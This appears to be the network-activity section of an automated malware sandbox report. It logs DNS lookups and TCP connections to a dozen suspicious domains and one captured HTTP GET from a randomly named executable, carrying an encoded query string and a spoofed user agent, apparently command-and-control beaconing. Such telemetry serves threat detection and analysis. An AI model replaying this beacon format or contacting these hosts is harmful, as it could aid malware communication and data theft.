                                              Jul 3, 2024 16:40:09.580679893 CEST4971880192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:09.585520029 CEST804971843.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:09.585608959 CEST4971880192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:09.587575912 CEST4971880192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:09.592461109 CEST804971843.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:11.094940901 CEST4971880192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:11.142512083 CEST804971843.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:12.113431931 CEST4971980192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:12.118627071 CEST804971943.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:12.118767023 CEST4971980192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:12.120249987 CEST4971980192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:12.126652956 CEST804971943.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:13.626638889 CEST4971980192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:13.674540997 CEST804971943.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:14.662834883 CEST4972080192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:14.667970896 CEST804972043.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:14.668064117 CEST4972080192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:14.669884920 CEST4972080192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:14.674722910 CEST804972043.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:14.674818993 CEST804972043.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:16.173305035 CEST4972080192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:16.218693972 CEST804972043.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:17.191378117 CEST4972180192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:17.196624994 CEST804972143.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:17.196748972 CEST4972180192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:17.198282957 CEST4972180192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:17.203324080 CEST804972143.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:30.977617025 CEST804971843.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:30.978332043 CEST4971880192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:33.497638941 CEST804971943.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:33.497735977 CEST4971980192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:36.014087915 CEST804972043.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:36.014168978 CEST4972080192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:38.572731972 CEST804972143.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:38.572868109 CEST4972180192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:38.573929071 CEST4972180192.168.2.543.155.26.241
                                              Jul 3, 2024 16:40:38.578877926 CEST804972143.155.26.241192.168.2.5
                                              Jul 3, 2024 16:40:43.622684002 CEST4972280192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:43.627738953 CEST80497223.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:43.627861977 CEST4972280192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:43.629817009 CEST4972280192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:43.635431051 CEST80497223.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:44.087464094 CEST80497223.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:44.087538958 CEST4972280192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:45.141807079 CEST4972280192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:45.147851944 CEST80497223.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:46.161448002 CEST4972380192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:46.166544914 CEST80497233.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:46.166623116 CEST4972380192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:46.168713093 CEST4972380192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:46.174329042 CEST80497233.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:46.663126945 CEST80497233.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:46.663187027 CEST4972380192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:47.673094034 CEST4972380192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:47.678006887 CEST80497233.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:48.701852083 CEST4972480192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:48.706758976 CEST80497243.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:48.706856966 CEST4972480192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:48.709886074 CEST4972480192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:48.714778900 CEST80497243.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:48.718329906 CEST80497243.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:49.181844950 CEST80497243.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:49.182322979 CEST4972480192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:50.219960928 CEST4972480192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:50.224821091 CEST80497243.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:51.238786936 CEST4972580192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:51.243875027 CEST80497253.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:51.246365070 CEST4972580192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:51.248119116 CEST4972580192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:51.254731894 CEST80497253.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:51.772938013 CEST80497253.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:51.773068905 CEST80497253.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:51.776304960 CEST4972580192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:51.782463074 CEST4972580192.168.2.53.33.130.190
                                              Jul 3, 2024 16:40:51.787412882 CEST80497253.33.130.190192.168.2.5
                                              Jul 3, 2024 16:40:57.138402939 CEST4972680192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:40:57.143992901 CEST8049726203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:40:57.144151926 CEST4972680192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:40:57.146461010 CEST4972680192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:40:57.155639887 CEST8049726203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:40:57.752840996 CEST8049726203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:40:57.752886057 CEST8049726203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:40:57.753010035 CEST4972680192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:40:58.657493114 CEST4972680192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:40:59.678306103 CEST4972780192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:40:59.688220024 CEST8049727203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:40:59.688441038 CEST4972780192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:40:59.690541983 CEST4972780192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:40:59.695790052 CEST8049727203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:00.285546064 CEST8049727203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:00.285629034 CEST8049727203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:00.285687923 CEST4972780192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:01.204592943 CEST4972780192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:02.223958969 CEST4972880192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:02.228838921 CEST8049728203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:02.228919983 CEST4972880192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:02.231278896 CEST4972880192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:02.236390114 CEST8049728203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:02.236402988 CEST8049728203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:02.849128962 CEST8049728203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:02.849273920 CEST8049728203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:02.849338055 CEST4972880192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:03.738543987 CEST4972880192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:04.755228043 CEST4972980192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:04.760241985 CEST8049729203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:04.760329008 CEST4972980192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:04.762644053 CEST4972980192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:04.769531965 CEST8049729203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:05.396370888 CEST8049729203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:05.397351980 CEST8049729203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:05.400410891 CEST4972980192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:05.404247999 CEST4972980192.168.2.5203.161.55.102
                                              Jul 3, 2024 16:41:05.409565926 CEST8049729203.161.55.102192.168.2.5
                                              Jul 3, 2024 16:41:10.738576889 CEST4973080192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:10.747028112 CEST8049730108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:10.747123003 CEST4973080192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:10.750220060 CEST4973080192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:10.762413025 CEST8049730108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:11.412092924 CEST8049730108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:11.412522078 CEST8049730108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:11.414477110 CEST4973080192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:12.266894102 CEST4973080192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:13.285876989 CEST4973180192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:13.292262077 CEST8049731108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:13.294363022 CEST4973180192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:13.298605919 CEST4973180192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:13.309412003 CEST8049731108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:13.938481092 CEST8049731108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:13.938981056 CEST8049731108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:13.939105034 CEST4973180192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:14.798051119 CEST4973180192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:15.817070007 CEST4973280192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:15.821928978 CEST8049732108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:15.824385881 CEST4973280192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:15.828269958 CEST4973280192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:15.834769011 CEST8049732108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:15.834780931 CEST8049732108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:16.468796968 CEST8049732108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:16.476917982 CEST8049732108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:16.476986885 CEST4973280192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:17.329364061 CEST4973280192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:18.348992109 CEST4973380192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:18.353871107 CEST8049733108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:18.353954077 CEST4973380192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:18.356312990 CEST4973380192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:18.361241102 CEST8049733108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:19.225675106 CEST8049733108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:19.225687981 CEST8049733108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:19.225703001 CEST8049733108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:19.225826979 CEST4973380192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:19.225915909 CEST4973380192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:19.228818893 CEST4973380192.168.2.5108.179.193.98
                                              Jul 3, 2024 16:41:19.234436989 CEST8049733108.179.193.98192.168.2.5
                                              Jul 3, 2024 16:41:40.882946014 CEST4973480192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:40.891582966 CEST804973435.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:40.891669989 CEST4973480192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:40.894341946 CEST4973480192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:40.901521921 CEST804973435.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:41.533133030 CEST804973435.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:41.535643101 CEST804973435.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:41.535753012 CEST804973435.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:41.535856962 CEST4973480192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:42.407447100 CEST4973480192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:43.444988012 CEST4973580192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:43.449911118 CEST804973535.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:43.450139046 CEST4973580192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:43.452306032 CEST4973580192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:43.457135916 CEST804973535.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:44.097403049 CEST804973535.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:44.099843979 CEST804973535.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:44.099894047 CEST4973580192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:44.100023985 CEST804973535.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:44.100073099 CEST4973580192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:44.954336882 CEST4973580192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:45.972950935 CEST4973680192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:45.979283094 CEST804973635.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:45.982606888 CEST4973680192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:45.986387014 CEST4973680192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:45.991519928 CEST804973635.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:45.991533995 CEST804973635.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:46.698823929 CEST804973635.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:46.702044010 CEST804973635.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:46.702091932 CEST4973680192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:46.702548027 CEST804973635.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:46.702604055 CEST4973680192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:47.485814095 CEST4973680192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:48.567806959 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:48.693413019 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:48.693489075 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:48.696413040 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:48.702730894 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.340217113 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355428934 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355463982 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355475903 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355639935 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:49.355667114 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355676889 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355732918 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:49.355813980 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:49.357033968 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.358762026 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:49.362293959 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:49.367209911 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:54.401077986 CEST4973880192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:54.406097889 CEST804973874.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:54.406248093 CEST4973880192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:54.409286022 CEST4973880192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:54.414536953 CEST804973874.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:54.940505028 CEST804973874.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:54.940727949 CEST804973874.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:54.940776110 CEST4973880192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:55.924299002 CEST4973880192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:56.943294048 CEST4973980192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:56.948288918 CEST804973974.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:56.948369026 CEST4973980192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:56.950323105 CEST4973980192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:56.955842018 CEST804973974.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:57.469104052 CEST804973974.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:57.469856024 CEST804973974.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:57.470074892 CEST4973980192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:58.829282999 CEST4973980192.168.2.574.208.46.171

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 3, 2024 16:39:26.747170925 CEST5828353192.168.2.51.1.1.1
                                              Jul 3, 2024 16:39:26.880378008 CEST53582831.1.1.1192.168.2.5
                                              Jul 3, 2024 16:39:31.895854950 CEST6215753192.168.2.51.1.1.1
                                              Jul 3, 2024 16:39:32.223649979 CEST53621571.1.1.1192.168.2.5
                                              Jul 3, 2024 16:39:47.864443064 CEST5477853192.168.2.51.1.1.1
                                              Jul 3, 2024 16:39:47.891410112 CEST53547781.1.1.1192.168.2.5
                                              Jul 3, 2024 16:39:55.958302021 CEST6464653192.168.2.51.1.1.1
                                              Jul 3, 2024 16:39:55.996679068 CEST53646461.1.1.1192.168.2.5
                                              Jul 3, 2024 16:40:09.101967096 CEST5018853192.168.2.51.1.1.1
                                              Jul 3, 2024 16:40:09.577852011 CEST53501881.1.1.1192.168.2.5
                                              Jul 3, 2024 16:40:43.583199024 CEST4958453192.168.2.51.1.1.1
                                              Jul 3, 2024 16:40:43.620145082 CEST53495841.1.1.1192.168.2.5
                                              Jul 3, 2024 16:40:56.786376953 CEST6329853192.168.2.51.1.1.1
                                              Jul 3, 2024 16:40:57.133352041 CEST53632981.1.1.1192.168.2.5
                                              Jul 3, 2024 16:41:10.413326979 CEST5428353192.168.2.51.1.1.1
                                              Jul 3, 2024 16:41:10.734431028 CEST53542831.1.1.1192.168.2.5
                                              Jul 3, 2024 16:41:24.240782976 CEST5266753192.168.2.51.1.1.1
                                              Jul 3, 2024 16:41:24.251256943 CEST53526671.1.1.1192.168.2.5
                                              Jul 3, 2024 16:41:32.318276882 CEST5827553192.168.2.51.1.1.1
                                              Jul 3, 2024 16:41:32.329464912 CEST53582751.1.1.1192.168.2.5
                                              Jul 3, 2024 16:41:40.397211075 CEST5857753192.168.2.51.1.1.1
                                              Jul 3, 2024 16:41:40.880045891 CEST53585771.1.1.1192.168.2.5
                                              Jul 3, 2024 16:41:54.380162001 CEST6247353192.168.2.51.1.1.1
                                              Jul 3, 2024 16:41:54.397344112 CEST53624731.1.1.1192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jul 3, 2024 16:39:26.747170925 CEST192.168.2.51.1.1.10x602aStandard query (0)www.gospelstudygroup.orgA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:31.895854950 CEST192.168.2.51.1.1.10xa06aStandard query (0)www.valerieomage.comA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:47.864443064 CEST192.168.2.51.1.1.10x4e0bStandard query (0)www.instantmailer.cloudA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:55.958302021 CEST192.168.2.51.1.1.10xaec6Standard query (0)www.kosherphonestore.comA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:09.101967096 CEST192.168.2.51.1.1.10xbc2cStandard query (0)www.cwgehkk.storeA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:43.583199024 CEST192.168.2.51.1.1.10x873dStandard query (0)www.mybodyradar.netA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:56.786376953 CEST192.168.2.51.1.1.10x27b7Standard query (0)www.lacemalt.topA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:10.413326979 CEST192.168.2.51.1.1.10x4640Standard query (0)www.siteblogoficialon.comA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:24.240782976 CEST192.168.2.51.1.1.10xee4eStandard query (0)www.mcxright.comA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:32.318276882 CEST192.168.2.51.1.1.10xcc8dStandard query (0)www.amkmos.onlineA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:40.397211075 CEST192.168.2.51.1.1.10x1b0fStandard query (0)www.mg55aa.xyzA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:54.380162001 CEST192.168.2.51.1.1.10x831bStandard query (0)www.lavillitadepapa.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jul 3, 2024 16:39:26.880378008 CEST1.1.1.1192.168.2.50x602aName error (3)www.gospelstudygroup.orgnonenoneA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:32.223649979 CEST1.1.1.1192.168.2.50xa06aNo error (0)www.valerieomage.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 3, 2024 16:39:32.223649979 CEST1.1.1.1192.168.2.50xa06aNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:47.891410112 CEST1.1.1.1192.168.2.50x4e0bName error (3)www.instantmailer.cloudnonenoneA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:55.996679068 CEST1.1.1.1192.168.2.50xaec6No error (0)www.kosherphonestore.comwww.kosherphonestore.com.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                              Jul 3, 2024 16:39:55.996679068 CEST1.1.1.1192.168.2.50xaec6No error (0)www.kosherphonestore.com.cdn.hstgr.net84.32.84.130A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:09.577852011 CEST1.1.1.1192.168.2.50xbc2cNo error (0)www.cwgehkk.store43.155.26.241A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:43.620145082 CEST1.1.1.1192.168.2.50x873dNo error (0)www.mybodyradar.netmybodyradar.netCNAME (Canonical name)IN (0x0001)false
                                              Jul 3, 2024 16:40:43.620145082 CEST1.1.1.1192.168.2.50x873dNo error (0)mybodyradar.net3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:43.620145082 CEST1.1.1.1192.168.2.50x873dNo error (0)mybodyradar.net15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:57.133352041 CEST1.1.1.1192.168.2.50x27b7No error (0)www.lacemalt.top203.161.55.102A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:10.734431028 CEST1.1.1.1192.168.2.50x4640No error (0)www.siteblogoficialon.comsiteblogoficialon.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 3, 2024 16:41:10.734431028 CEST1.1.1.1192.168.2.50x4640No error (0)siteblogoficialon.com108.179.193.98A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:24.251256943 CEST1.1.1.1192.168.2.50xee4eName error (3)www.mcxright.comnonenoneA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:32.329464912 CEST1.1.1.1192.168.2.50xcc8dName error (3)www.amkmos.onlinenonenoneA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:40.880045891 CEST1.1.1.1192.168.2.50x1b0fNo error (0)www.mg55aa.xyz35.241.34.216A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:54.397344112 CEST1.1.1.1192.168.2.50x831bNo error (0)www.lavillitadepapa.com74.208.46.171A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.valerieomage.com
                                              • www.kosherphonestore.com
                                              • www.cwgehkk.store
                                              • www.mybodyradar.net
                                              • www.lacemalt.top
                                              • www.siteblogoficialon.com
                                              • www.mg55aa.xyz
                                              • www.lavillitadepapa.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.54971123.227.38.74805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:39:32.243674994 CEST548OUTGET /c7rq/?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.valerieomage.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Jul 3, 2024 16:39:32.818770885 CEST1236INHTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:39:32 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Sorting-Hat-PodId: 223
                                              X-Sorting-Hat-ShopId: 70582403296
                                              X-Storefront-Renderer-Rendered: 1
                                              location: https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp
                                              x-redirect-reason: https_required
                                              x-frame-options: DENY
                                              content-security-policy: frame-ancestors 'none';
                                              x-shopid: 70582403296
                                              x-shardid: 223
                                              vary: Accept
                                              powered-by: Shopify
                                              server-timing: processing;dur=13;desc="gc:1", db;dur=4, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="2ljb", requestID;desc="79e26ac4-b8d2-49b7-aad5-6bf623d40852-1720017572"
                                              x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                              x-request-id: 79e26ac4-b8d2-49b7-aad5-6bf623d40852-1720017572
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogqC992MOgu0KctDu5ItZUss6Y1Wn1nUFE1NeXx7EUyBGDRaZRRewDS%2F%2FRzW59Z4tNYSnmrb%2FjBus8kpb2hLorabTggF5AdfDRM9izZQdpWxeyCrICdxTMyt1inWe0auiScoRJ3V"}],"group":"cf-nel","max_age
                                              Data Raw:
                                              Data Ascii:
